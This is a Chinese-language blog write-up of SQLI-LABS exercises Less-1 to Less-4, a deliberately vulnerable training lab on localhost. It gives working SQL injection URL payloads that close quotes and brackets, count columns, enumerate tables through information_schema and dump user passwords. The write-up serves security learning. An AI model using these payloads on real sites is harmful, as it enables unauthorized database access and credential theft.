SQLI-LABS修炼笔记

Basic Chllenge

Less-1

判断注入点:

http://127.0.0.1/sqli-lab/Less-1/?id=1

'找到注入点,发现已经闭合:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

接下来注释注入就可以了。可以用#或--+注释。

猜字段数:

http://127.0.0.1/sqli-lab/Less-1/?id=1' order by 3--+

4的时候报错,3的时候不报错,判断字段数为3.

查库:

http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,3--+

显示位为2,3.

http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,database(),version()--+http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,group_concat(database(),version())--+

数据库为security;数据库版本为5.5.53.
查表:

http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表:emails,referers,uagents,users.

查列:

http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

列:id,username,password.

查内容:

http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,password from users--+

password:Dumb.

Less-2

查找注入点:

http://127.0.0.1/sqli-lab/Less-2/?id=1'

发现报错信息,输入的单引号并没有把语句闭合。原来已经闭合加上'又多了一个':

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

因此把Less-1的'去掉即可。

payload:

http://127.0.0.1/sqli-lab/Less-2/?id=1--+

其他部分和Less-1一样。

Less-3

查找注入点:

http://127.0.0.1/sqli-lab/Less-3/?id=1'

通过报错信息发现还有括号,应该利用引号+括号闭合语句:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

paylaod:

http://127.0.0.1/sqli-lab/Less-3/?id=1')--+

其他部分和Less-1一样。

Less-4 

查找注入点:
http://127.0.0.1/sqli-lab/Less-4/?id=1'

加单引号发现没有报错。

http://127.0.0.1/sqli-lab/Less-4/?id=1"

加双引号报错,通过报错信息发现需要双引号和括号闭合:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

paylaod:

http://127.0.0.1/sqli-lab/Less-4/?id=1")--+

其他部分和Less-1一样。

1 + 1 =
快来做第一个评论的人吧~